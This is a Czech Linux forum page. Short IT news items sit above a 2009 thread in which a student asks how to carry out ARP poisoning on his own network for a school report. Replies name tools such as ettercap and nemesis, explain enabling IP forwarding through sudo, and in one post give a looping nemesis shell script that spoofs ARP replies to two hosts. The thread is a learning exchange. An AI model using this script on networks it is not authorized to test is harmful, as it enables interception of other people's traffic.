abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    včera 22:44 | Bezpečnostní upozornění

    NÚKIB upozorňuje na kritickou zranitelnost v SharePointu. Jedná se o kritickou zranitelnost typu RCE (remote code execution) – CVE-2025-53770, která umožňuje neautentizovaný vzdálený přístup a spuštění kódu, což může vést k úplnému převzetí kontroly nad serverem. Zranitelné verze jsou pouze on-premise verze a to konkrétně SharePoint Server 2016, 2019 a Subscription Edition. SharePoint Online (Microsoft 365) není touto zranitelností ohrožen.

    Ladislav Hagara | Komentářů: 2
    včera 21:00 | IT novinky

    Společnost Valve zpřísnila pravidla pro obsah, který je možné distribuovat ve službě Steam. Současně řadu her ze Steamu odstranila. V zásadách a pravidlech přibylo omezení 15: Obsah, který by mohl porušovat pravidla a normy stanovené zpracovateli plateb a souvisejícími sítěmi platebních karet a bankami nebo poskytovateli připojení k internetu. Sem spadají zejména určité druhy obsahu pouze pro dospělé.

    Ladislav Hagara | Komentářů: 0
    včera 13:33 | Komunita

    Dle analytics.usa.gov je za posledních 90 dnů 6,2 % přístupů k webových stránkám a aplikacím federální vlády Spojených států z Linuxu.

    Ladislav Hagara | Komentářů: 0
    20.7. 17:44 | Zajímavý článek

    Jak si zobrazit pomocí Chrome a na Chromiu založených webových prohlížečích stránky s neplatným certifikátem? Stačí napsat thisisunsafe.

    Ladislav Hagara | Komentářů: 3
    20.7. 00:33 | Bezpečnostní upozornění

    V repozitáři AUR (Arch User Repository) linuxové distribuce Arch Linux byly nalezeny a odstraněny tři balíčky s malwarem. Jedná se o librewolf-fix-bin, firefox-patch-bin a zen-browser-patched-bin.

    Ladislav Hagara | Komentářů: 15
    20.7. 00:22 | Komunita

    Dle plánu by Debian 13 s kódovým názvem Trixie měl vyjít v sobotu 9. srpna.

    Ladislav Hagara | Komentářů: 0
    19.7. 13:22 | Komunita

    Vývoj linuxové distribuce Clear Linux (Wikipedie) vyvíjené společností Intel a optimalizováné pro jejich procesory byl oficiálně ukončen.

    Ladislav Hagara | Komentářů: 1
    18.7. 14:00 | Zajímavý článek

    Byl publikován aktuální přehled vývoje renderovacího jádra webového prohlížeče Servo (Wikipedie).

    Ladislav Hagara | Komentářů: 0
    18.7. 12:00 | Nová verze

    V programovacím jazyce Go naprogramovaná webová aplikace pro spolupráci na zdrojových kódech pomocí gitu Forgejo byla vydána ve verzi 12.0 (Mastodon). Forgejo je fork Gitei.

    Ladislav Hagara | Komentářů: 2
    17.7. 18:44 | Zajímavý článek

    Nová čísla časopisů od nakladatelství Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 155 (pdf) a Hello World 27 (pdf).

    Ladislav Hagara | Komentářů: 1
    Kolik tabů máte standardně otevřeno ve web prohlížeči?
     (29%)
     (21%)
     (4%)
     (7%)
     (2%)
     (4%)
     (4%)
     (30%)
    Celkem 56 hlasů
     Komentářů: 9, poslední včera 15:56
    Rozcestník
    Štítky: není přiřazen žádný štítek

    Dotaz: Arp poisoning

    29.10.2009 14:57 Marek Adamovsky
    Arp poisoning
    Přečteno: 764×
    Dobry den, rad bych na sve siti provedl ARP poisoning, abych mohl tento utok analyzovat a popsat jako praci do skoly. Muzete mi prosim poradit jakou aplikaci na ARP poisoning pouzit?

    Odpovědi

    Cubic avatar 29.10.2009 15:21 Cubic | skóre: 24 | blog: obcasne_vyplody | Essex
    Rozbalit Rozbalit vše Re: Arp poisoning
    google nic? zacit muzes s ettercap
    29.10.2009 16:49 Marek Adamovsky
    Rozbalit Rozbalit vše Re: Arp poisoning
    Dekuji, prave to zkousim. Podle tohoto navodu: http://openmaniak.com/ettercap_arp.php Data zachytavam Wiresharkem, jenze mi to funguje tak na pul. "Otraveny" host posle pozadavek (treba na nacteni stranky) na router, ja ho ale u sebe nevidim. Vidim pouze odpoved, ktera prijde.

    Je to jako kdyby host nebyl otraveny a posilal data spravne na router a router byl otraveny a posilal data ke mne. Je neco takoveho mozne? V cem muze byt chyba?

    A jeste bych se chtel zeptat, jestli je toto ok:
    $ cat /proc/sys/net/ipv4/ip_forward
    0
    
    Cubic avatar 29.10.2009 17:22 Cubic | skóre: 24 | blog: obcasne_vyplody | Essex
    Rozbalit Rozbalit vše Re: Arp poisoning

    nevim, jen jsem si vzpomnel ze to je v ettercapu mozne ale predpokladam ze

    echo 1 > /proc/sys/net/ipv4/ip_forward
    potreba bude
    29.10.2009 17:33 Marek Adamovsky
    Rozbalit Rozbalit vše Re: Arp poisoning
    A nevite proc nejde toto:
    $ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
    bash: /proc/sys/net/ipv4/ip_forward: Permission denied
    
    Pokud se ale prepnu na roota pres su tak to jde, ale ja bych to rad umistil do skriptu.
    Bilbo avatar 29.10.2009 17:51 Bilbo | skóre: 29
    Rozbalit Rozbalit vše Re: Arp poisoning
    Protoze to provede prikaz "echo 1" pod rootem a jeho vystup (uz pod normalnim uzivatelem) presmeruje do /proc/sys/net/ipv4/ip_forward

    Musi se to ouvozovkovat:

    sudo 'echo 1 > /proc/sys/net/ipv4/ip_forward'

    pak se to spusti spravne cele jako prikaz pod rootem
    Big brother is not watching you anymore. Big Brother is telling you how to live...
    8.11.2009 09:32 Marek Adamovsky
    Rozbalit Rozbalit vše Re: Arp poisoning
    Stale nic:
    $ sudo 'echo 1 > /proc/sys/net/ipv4/ip_forward'
    sudo: echo 1 > /proc/sys/net/ipv4/ip_forward: command not found
    
    8.11.2009 11:30 l4m4
    Rozbalit Rozbalit vše Re: Arp poisoning
    sudo takhle nefunguje (tj. nenechává napsané interpretovat shellem), protože by to citelně zkomplikovalo omezení, když má uživatel povoleno spouštět jen určité věci. sudo prostě napsané exec-ne.

    a) spouštěj to v rootovském shellu

    b) dej to do skriptu, ten pak můžeš spouštět přes sudo
    Bilbo avatar 8.11.2009 15:20 Bilbo | skóre: 29
    Rozbalit Rozbalit vše Re: Arp poisoning
    No, pokud je sudo "neomezene" (osobne sudo nepouzivam, jen su, takze ho moc neznam, ale tusim nejak takhle je nastaveno treba ve vychozi konfiguraci Ubuntu), tak i s tim shellem by to slo, asi by se muselo pouzit neco jako:

    sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

    nebo

    sudo "sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'"

    Nebo ten skript :)
    Big brother is not watching you anymore. Big Brother is telling you how to live...
    29.10.2009 16:17 NN
    Rozbalit Rozbalit vše Re: Arp poisoning
    nemesis (odzkouseno :D )

    NN
    29.10.2009 19:40 faha
    Rozbalit Rozbalit vše Re: Arp poisoning

    Zdravim, je to vcelku "trivialni" utok a take je pomerne dobre popsany, hezky je to popsane v knize Linux hackerské útoky.

    Jeden z pouzivanych nastroju je nemesis, najdete ho alespon v debianu primo v repositari.

    nemesis - TCP/IP Packet Injection Suite

    Jeste prikladam skriptik jak to udelat...

    ----

    #!/bin/sh

    SOURCEMAC=""
    SOURCEIP=""

    DESTMAC=""
    DESTIP=""

    MYMAC=""
    MYIP=""

    while true
    do
    # 1
    /usr/bin/nemesis arp -v -r -d eth0 -S $DESTIP -D $SOURCEIP -h $MYMAC -m $SOURCEMAC -H $MYMAC -M $SOURCEMAC

    # 2
    /usr/bin/nemesis arp -v -r -d eth0 -S $SOURCEIP -D $DESTIP -h $MYMAC -m $DESTMAC -H $MYMAC -M $DESTMAC
    echo "Injecting ... "
    sleep 10
    done
    ----

    Jendа avatar 29.10.2009 20:42 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Arp poisoning
    29.10.2009 21:29 pht | skóre: 48 | blog: pht
    Rozbalit Rozbalit vše Re: Arp poisoning
    Na to stačí arping. Jinak, zkuste si najít "hunt".
    In Ada the typical infinite loop would normally be terminated by detonation.

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.